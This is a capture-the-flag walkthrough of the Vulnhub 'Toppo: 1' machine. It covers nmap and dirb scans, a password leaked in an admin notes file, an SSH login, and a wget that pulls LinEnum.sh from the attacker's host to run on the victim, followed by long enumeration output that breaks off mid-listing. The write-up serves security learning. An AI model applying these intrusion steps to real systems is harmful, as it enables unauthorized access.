Toppo 1
Toppo: 1 Vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/Toppo 192.168.43.243Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 03:45 EDT
Nmap scan report for Toppo (192.168.43.243)
Host is up (0.00076s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 53154/udp status
| 100024 1 53934/udp6 status
| 100024 1 58497/tcp status
|_ 100024 1 59067/tcp6 status
MAC Address: 00:0C:29:D9:A7:6B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 secondsAfter we put the IP to the web browser, we got this
Nothing seems to be interesting so I went to dirb
dirb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 17 05:28:05 2020
URL_BASE: http://192.168.43.243/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.43.243/ ----
==> DIRECTORY: http://192.168.43.243/admin/
==> DIRECTORY: http://192.168.43.243/css/
==> DIRECTORY: http://192.168.43.243/img/
+ http://192.168.43.243/index.html (CODE:200|SIZE:6437)
==> DIRECTORY: http://192.168.43.243/js/
+ http://192.168.43.243/LICENSE (CODE:200|SIZE:1093)
==> DIRECTORY: http://192.168.43.243/mail/
==> DIRECTORY: http://192.168.43.243/manual/
+ http://192.168.43.243/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.43.243/vendor/ As we can see here there is a admin that might have some interesting stuffs inside, let's take a look into it.
Got this and when we click into the notes.txt
We got the password for the ssh!
ssh
From the password, I guess the username is ted and the password is 12345ted123, then we ssh into the user
We manage to login!
Exploitation
LinEnum.sh
I use this script to enumerate the machine.
By using the python -m SimpleHTTPServer, we can transfer files from our machine to victim's machine
Our Machine:
Victim's Machine:
wget 192.168.43.182:8000/LinEnum.shAfter that, chmod +x LinEnum.sh to make it executable
run by typing ./LinEnum.sh
-rwxr-xr-x 1 root root 4125 Feb 10 2018 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
[-] Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 Dec 28 2014 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron
# See anacron(8) and anacrontab(5) for details.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
# These replace cron's entries
1 5 cron.daily run-parts --report /etc/cron.daily
7 10 cron.weekly run-parts --report /etc/cron.weekly
@monthly 15 cron.monthly run-parts --report /etc/cron.monthly
[-] When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 6 root root 4096 Apr 15 2018 ..
-rw------- 1 root root 9 May 17 02:47 cron.daily
-rw------- 1 root root 9 May 17 02:57 cron.monthly
-rw------- 1 root root 9 May 17 02:52 cron.weekly
[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2020-05-18 02:57:05 CDT 22h left Sun 2020-05-17 02:57:05 CDT 1h 38min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
1 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING ##########################################
[-] Network and IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:d9:a7:6b
inet addr:192.168.43.243 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed9:a76b/64 Scope:Link
inet6 addr: 2001:d08:1013:1e84:20c:29ff:fed9:a76b/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:345209 errors:1 dropped:2 overruns:0 frame:0
TX packets:283797 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:46933742 (44.7 MiB) TX bytes:98213804 (93.6 MiB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:792 (792.0 B) TX bytes:792 (792.0 B)
[-] ARP history:
fe80::16d1:69ff:fe52:5d6a dev eth0 lladdr 14:d1:69:52:5d:6a router STALE
192.168.43.67 dev eth0 lladdr 00:0c:29:20:b4:b1 STALE
192.168.43.182 dev eth0 lladdr 00:0c:29:20:b4:b1 REACHABLE
192.168.43.1 dev eth0 lladdr 14:d1:69:52:5d:6a STALE
[-] Nameserver(s):
nameserver 192.168.43.1
[-] Default route:
default via 192.168.43.1 dev eth0
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:58497 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::59067 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:20820 0.0.0.0:* -
udp 0 0 0.0.0.0:53154 0.0.0.0:* -
udp 0 0 0.0.0.0:995 0.0.0.0:* -
udp 0 0 127.0.0.1:1006 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::53934 :::* -
udp6 0 0 :::35695 :::* -
udp6 0 0 :::995 :::* -
udp6 0 0 :::111 :::* -
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 22808 4040 ? Ss 02:42 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 02:42 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 02:42 0:01 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? S 02:42 0:00 [kworker/u2:0]
root 7 0.0 0.0 0 0 ? S 02:42 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 02:42 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 02:42 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 02:42 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 02:42 0:00 [khungtaskd]
root 12 0.0 0.0 0 0 ? S< 02:42 0:00 [writeback]
root 13 0.0 0.0 0 0 ? SN 02:42 0:00 [ksmd]
root 14 0.0 0.0 0 0 ? S< 02:42 0:00 [crypto]
root 15 0.0 0.0 0 0 ? S< 02:42 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 02:42 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 02:42 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S 02:42 0:00 [kswapd0]
root 20 0.0 0.0 0 0 ? S 02:42 0:00 [fsnotify_mark]
root 26 0.0 0.0 0 0 ? S< 02:42 0:00 [kthrotld]
root 27 0.0 0.0 0 0 ? S< 02:42 0:00 [ipv6_addrconf]
root 28 0.0 0.0 0 0 ? S< 02:42 0:00 [deferwq]
root 63 0.0 0.0 0 0 ? S< 02:42 0:00 [ata_sff]
root 64 0.0 0.0 0 0 ? S< 02:42 0:00 [mpt_poll_0]
root 65 0.0 0.0 0 0 ? S 02:42 0:00 [khubd]
root 66 0.0 0.0 0 0 ? S< 02:42 0:00 [mpt/0]
root 67 0.0 0.0 0 0 ? S< 02:42 0:00 [kpsmoused]
root 69 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_0]
root 70 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_0]
root 71 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_1]
root 72 0.0 0.0 0 0 ? S 02:42 0:00 [kworker/u2:2]
root 74 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_1]
root 75 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_2]
root 76 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_2]
root 80 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/0:1H]
root 101 0.0 0.0 0 0 ? S 02:42 0:00 [jbd2/sda1-8]
root 102 0.0 0.0 0 0 ? S< 02:42 0:00 [ext4-rsv-conver]
root 133 0.0 0.0 0 0 ? S 02:42 0:00 [kauditd]
root 138 0.0 0.2 9376 4644 ? Ss 02:42 0:05 /lib/systemd/systemd-journald
root 142 0.0 0.1 12484 3304 ? Ss 02:42 0:00 /lib/systemd/systemd-udevd
root 178 0.0 0.0 0 0 ? S< 02:42 0:00 [ttm_swap]
root 183 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/u3:0]
root 186 0.0 0.0 0 0 ? S< 02:42 0:00 [hci0]
root 187 0.0 0.0 0 0 ? S< 02:42 0:00 [hci0]
root 220 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/u3:2]
root 396 0.0 0.1 4444 2832 ? Ss 02:42 0:00 /sbin/rpcbind -w
statd 406 0.0 0.1 4620 2904 ? Ss 02:42 0:00 /sbin/rpc.statd
root 415 0.0 0.0 0 0 ? S< 02:42 0:00 [rpciod]
root 417 0.0 0.0 0 0 ? S< 02:42 0:00 [nfsiod]
root 424 0.0 0.0 2920 1608 ? Ss 02:42 0:00 /usr/sbin/rpc.idmapd
root 425 0.0 0.1 5412 3532 ? Ss 02:42 0:00 /usr/lib/bluetooth/bluetoothd
root 427 0.0 0.1 5012 2784 ? Ss 02:42 0:00 /usr/sbin/cron -f
daemon 428 0.0 0.0 2648 1892 ? Ss 02:42 0:00 /usr/sbin/atd -f
root 431 0.0 0.1 3528 2452 ? Ss 02:42 0:00 /lib/systemd/systemd-logind
message+ 434 0.0 0.1 5348 3400 ? Ss 02:42 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 444 0.0 0.1 31096 3536 ? Ssl 02:42 0:01 /usr/sbin/rsyslogd -n
root 446 0.0 0.0 2196 1600 ? Ss 02:42 0:00 /usr/sbin/acpid
root 449 0.0 0.0 4176 2056 tty1 Ss+ 02:42 0:00 /sbin/agetty --noclear tty1 linux
root 490 0.0 0.2 8108 4812 ? Ss 02:42 0:02 /usr/sbin/sshd -D
root 571 0.0 0.9 94272 20588 ? Ss 02:42 0:00 /usr/sbin/apache2 -k start
Debian-+ 728 0.0 0.1 9936 2980 ? Ss 02:42 0:00 /usr/sbin/exim4 -bd -q30m
root 749 0.0 0.3 9248 6780 ? Ss 02:42 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
www-data 966 0.0 0.3 94744 7712 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 967 0.0 0.3 94736 7680 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 968 0.0 0.3 94736 7600 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 969 0.0 0.3 94736 7672 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 970 0.0 0.5 94728 11164 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 1221 0.0 0.3 94736 7504 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 1223 0.0 0.3 94720 7596 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 1224 0.0 0.3 94736 7532 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 1225 0.0 0.5 94736 11084 ? S 02:47 0:05 /usr/sbin/apache2 -k start
www-data 1226 0.0 0.4 94736 10320 ? S 02:47 0:05 /usr/sbin/apache2 -k start
ted 7567 0.0 0.0 2920 1504 ? Ss 04:00 0:00 /usr/sbin/rpc.idmapd
root 8651 0.0 0.0 0 0 ? S 04:22 0:00 [kworker/0:1]
root 8669 0.0 0.0 0 0 ? S 04:27 0:00 [kworker/0:2]
root 8670 0.0 0.2 11120 5404 ? Ss 04:30 0:00 sshd: ted [priv]
ted 8672 0.0 0.2 11120 4440 ? S 04:30 0:00 sshd: ted@pts/0
ted 8673 0.0 0.2 6396 4564 pts/0 Ss 04:30 0:00 -bash
root 8683 0.0 0.0 0 0 ? S 04:32 0:00 [kworker/0:0]
ted 8696 0.0 0.1 5844 3756 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh
ted 8697 0.0 0.1 5880 3344 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh
ted 8698 0.0 0.0 3748 1616 pts/0 S+ 04:35 0:00 tee -a
ted 8878 0.0 0.1 5880 2620 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh
ted 8879 0.0 0.1 4772 2468 pts/0 R+ 04:35 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
1.1M -rwxr-xr-x 1 root root 1.1M Nov 5 2016 /bin/bash
260K -rwxr-xr-x 1 root root 258K Apr 8 2017 /lib/systemd/systemd-journald
528K -rwxr-xr-x 1 root root 526K Apr 8 2017 /lib/systemd/systemd-logind
296K -rwxr-xr-x 1 root root 294K Apr 8 2017 /lib/systemd/systemd-udevd
36K -rwxr-xr-x 1 root root 34K Mar 29 2015 /sbin/agetty
0 lrwxrwxrwx 1 root root 20 Apr 8 2017 /sbin/init -> /lib/systemd/systemd
48K -rwxr-xr-x 1 root root 46K May 4 2017 /sbin/rpcbind
76K -rwxr-xr-x 1 root root 75K Aug 13 2014 /sbin/rpc.statd
508K -rwxr-xr-x 1 root root 507K Nov 21 2016 /usr/bin/dbus-daemon
1.1M -rwxr-xr-x 1 root root 1.1M Sep 13 2017 /usr/lib/bluetooth/bluetoothd
52K -rwxr-xr-x 1 root root 50K Nov 8 2014 /usr/sbin/acpid
628K -rwxr-xr-x 1 root root 628K Mar 31 2018 /usr/sbin/apache2
24K -rwxr-xr-x 1 root root 22K Sep 30 2014 /usr/sbin/atd
44K -rwxr-xr-x 1 root root 43K Jun 7 2015 /usr/sbin/cron
1.1M -rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4
32K -rwxr-xr-x 1 root root 31K Aug 13 2014 /usr/sbin/rpc.idmapd
640K -rwxr-xr-x 1 root root 638K Dec 20 2015 /usr/sbin/rsyslogd
932K -rwxr-xr-x 1 root root 931K Nov 19 2017 /usr/sbin/sshd
[-] /etc/init.d/ binary permissions:
total 256
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rwxr-xr-x 1 root root 2243 Nov 8 2014 acpid
-rwxr-xr-x 1 root root 2014 Dec 28 2014 anacron
-rwxr-xr-x 1 root root 10192 Apr 15 2018 apache2
-rwxr-xr-x 1 root root 1071 Sep 30 2014 atd
-rwxr-xr-x 1 root root 2948 Sep 13 2017 bluetooth
-rwxr-xr-x 1 root root 1276 Apr 6 2015 bootlogs
-rwxr-xr-x 1 root root 1248 Apr 6 2015 bootmisc.sh
-rwxr-xr-x 1 root root 3807 Apr 6 2015 checkfs.sh
-rwxr-xr-x 1 root root 1072 Apr 6 2015 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9290 Apr 6 2015 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 8 2011 console-setup
-rwxr-xr-x 1 root root 3049 Oct 23 2014 cron
-rwxr-xr-x 1 root root 2813 Oct 10 2016 dbus
-rw-r--r-- 1 root root 1468 Apr 15 2018 .depend.boot
-rw-r--r-- 1 root root 497 Apr 15 2018 .depend.start
-rw-r--r-- 1 root root 567 Apr 15 2018 .depend.stop
-rwxr-xr-x 1 root root 6606 Feb 10 2018 exim4
-rwxr-xr-x 1 root root 1336 Apr 6 2015 halt
-rwxr-xr-x 1 root root 1423 Apr 6 2015 hostname.sh
-rwxr-xr-x 1 root root 3916 Mar 29 2015 hwclock.sh
-rwxr-xr-x 1 root root 8189 Oct 25 2014 kbd
-rwxr-xr-x 1 root root 1591 Sep 30 2012 keyboard-setup
-rwxr-xr-x 1 root root 1300 Apr 6 2015 killprocs
-rwxr-xr-x 1 root root 1990 Sep 23 2014 kmod
-rwxr-xr-x 1 root root 995 Apr 6 2015 motd
-rwxr-xr-x 1 root root 677 Apr 6 2015 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2138 Apr 6 2015 mountall.sh
-rwxr-xr-x 1 root root 1461 Apr 6 2015 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1564 Apr 6 2015 mountkernfs.sh
-rwxr-xr-x 1 root root 685 Apr 6 2015 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2456 Apr 6 2015 mountnfs.sh
-rwxr-xr-x 1 root root 4760 Dec 14 2014 networking
-rwxr-xr-x 1 root root 5658 Aug 12 2014 nfs-common
-rwxr-xr-x 1 root root 1192 Mar 6 2015 procps
-rwxr-xr-x 1 root root 6228 Apr 6 2015 rc
-rwxr-xr-x 1 root root 820 Apr 6 2015 rc.local
-rwxr-xr-x 1 root root 117 Apr 6 2015 rcS
-rw-r--r-- 1 root root 2427 Apr 6 2015 README
-rwxr-xr-x 1 root root 661 Apr 6 2015 reboot
-rwxr-xr-x 1 root root 1042 Apr 6 2015 rmnologin
-rwxr-xr-x 1 root root 2512 Sep 20 2015 rpcbind
-rwxr-xr-x 1 root root 2796 Dec 14 2015 rsyslog
-rwxr-xr-x 1 root root 3207 Apr 6 2015 sendsigs
-rwxr-xr-x 1 root root 597 Apr 6 2015 single
-rw-r--r-- 1 root root 1087 Apr 6 2015 skeleton
-rwxr-xr-x 1 root root 4077 Nov 18 2017 ssh
-rwxr-xr-x 1 root root 6581 Mar 9 2017 udev
-rwxr-xr-x 1 root root 461 Mar 9 2017 udev-finish
-rwxr-xr-x 1 root root 2737 Apr 6 2015 umountfs
-rwxr-xr-x 1 root root 2202 Apr 6 2015 umountnfs.sh
-rwxr-xr-x 1 root root 1129 Apr 6 2015 umountroot
-rwxr-xr-x 1 root root 3111 Apr 6 2015 urandom
[-] /etc/init/ config file permissions:
total 68
drwxr-xr-x 2 root root 4096 Apr 15 2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rw-r--r-- 1 root root 278 Dec 28 2014 anacron.conf
-rw-r--r-- 1 root root 2493 Jun 3 2014 networking.conf
-rw-r--r-- 1 root root 933 Jun 3 2014 network-interface.conf
-rw-r--r-- 1 root root 530 Jun 3 2014 network-interface-container.conf
-rw-r--r-- 1 root root 1756 May 4 2013 network-interface-security.conf
-rw-r--r-- 1 root root 815 Sep 20 2015 portmap-wait.conf
-rw-r--r-- 1 root root 209 Sep 20 2015 rpcbind-boot.conf
-rw-r--r-- 1 root root 1042 Sep 20 2015 rpcbind.conf
-rw-r--r-- 1 root root 641 Nov 18 2017 ssh.conf
-rw-r--r-- 1 root root 581 Apr 10 2014 startpar-bridge.conf
-rw-r--r-- 1 root root 337 Mar 9 2017 udev.conf
-rw-r--r-- 1 root root 637 Mar 9 2017 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 643 Mar 9 2017 udev-finish.conf
-rw-r--r-- 1 root root 356 Mar 9 2017 udevmonitor.conf
-rw-r--r-- 1 root root 352 Mar 9 2017 udevtrigger.conf
[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 6.6M
drwxr-xr-x 20 root root 36K Apr 15 2018 system
drwxr-xr-x 2 root root 4.0K Apr 15 2018 network
drwxr-xr-x 2 root root 4.0K Apr 15 2018 system-generators
drwxr-xr-x 2 root root 4.0K Apr 15 2018 system-preset
-rwxr-xr-x 1 root root 294K Apr 8 2017 systemd-udevd
-rwxr-xr-x 1 root root 46K Apr 8 2017 systemd-activate
-rwxr-xr-x 1 root root 82K Apr 8 2017 systemd-bootchart
-rwxr-xr-x 1 root root 66K Apr 8 2017 systemd-cryptsetup
-rwxr-xr-x 1 root root 262K Apr 8 2017 systemd-fsck
-rwxr-xr-x 1 root root 298K Apr 8 2017 systemd-hostnamed
-rwxr-xr-x 1 root root 258K Apr 8 2017 systemd-journald
-rwxr-xr-x 1 root root 306K Apr 8 2017 systemd-localed
-rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-remount-fs
-rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-reply-password
-rwxr-xr-x 1 root root 42K Apr 8 2017 systemd-rfkill
-rwxr-xr-x 1 root root 1.3M Apr 8 2017 systemd
-rwxr-xr-x 1 root root 54K Apr 8 2017 systemd-backlight
-rwxr-xr-x 1 root root 298K Apr 8 2017 systemd-bus-proxyd
-rwxr-xr-x 1 root root 238K Apr 8 2017 systemd-cgroups-agent
-rwxr-xr-x 1 root root 526K Apr 8 2017 systemd-logind
-rwxr-xr-x 1 root root 42K Apr 8 2017 systemd-modules-load
-rwxr-xr-x 1 root root 14K Apr 8 2017 systemd-multi-seat-x
-rwxr-xr-x 1 root root 74K Apr 8 2017 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-random-seed
-rwxr-xr-x 1 root root 78K Apr 8 2017 systemd-socket-proxyd
-rwxr-xr-x 1 root root 22K Apr 8 2017 systemd-user-sessions
-rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-binfmt
-rwxr-xr-x 1 root root 246K Apr 8 2017 systemd-initctl
-rwxr-xr-x 1 root root 330K Apr 8 2017 systemd-machined
-rwxr-xr-x 1 root root 546K Apr 8 2017 systemd-networkd
-rwxr-xr-x 1 root root 74K Apr 8 2017 systemd-readahead
-rwxr-xr-x 1 root root 78K Apr 8 2017 systemd-resolved
-rwxr-xr-x 1 root root 38K Apr 8 2017 systemd-shutdownd
-rwxr-xr-x 1 root root 310K Apr 8 2017 systemd-timedated
-rwxr-xr-x 1 root root 110K Apr 8 2017 systemd-timesyncd
-rwxr-xr-x 1 root root 242K Apr 8 2017 systemd-update-utmp
-rwxr-xr-x 1 root root 9.4K Apr 8 2017 systemd-ac-power
-rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-quotacheck
-rwxr-xr-x 1 root root 90K Apr 8 2017 systemd-shutdown
-rwxr-xr-x 1 root root 50K Apr 8 2017 systemd-sleep
-rwxr-xr-x 1 root root 38K Apr 8 2017 systemd-sysctl
-rwxr-xr-x 1 root root 546 Apr 8 2017 debian-fixup
-rwxr-xr-x 1 root root 462 Apr 8 2017 systemd-logind-launch
drwxr-xr-x 2 root root 4.0K Apr 8 2017 system-shutdown
drwxr-xr-x 2 root root 4.0K Apr 8 2017 system-sleep
/lib/systemd/system:
total 688K
drwxr-xr-x 2 root root 4.0K Apr 15 2018 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 apache2.service.d
drwxr-xr-x 2 root root 4.0K Apr 15 2018 getty.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel5.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 timers.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15 2018 networking.service.d
-rw-r--r-- 1 root root 404 Nov 18 2017 ssh.service
-rw-r--r-- 1 root root 196 Nov 18 2017 ssh@.service
-rw-r--r-- 1 root root 216 Nov 18 2017 ssh.socket
-rw-r--r-- 1 root root 244 Oct 14 2017 wpa_supplicant.service
-rw-r--r-- 1 root root 338 Sep 13 2017 bluetooth.service
lrwxrwxrwx 1 root root 21 Apr 8 2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 14 Apr 8 2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Apr 8 2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Apr 8 2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Apr 8 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Apr 8 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Apr 8 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 24 Apr 8 2017 dbus-org.freedesktop.machine1.service -> systemd-machined.service
lrwxrwxrwx 1 root root 25 Apr 8 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root 16 Apr 8 2017 default.target -> graphical.target
lrwxrwxrwx 1 root root 9 Apr 8 2017 fuse.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 hwclockfirst.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Apr 8 2017 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 28 Apr 8 2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Apr 8 2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 mountall-bootclean.service -> /dev/null
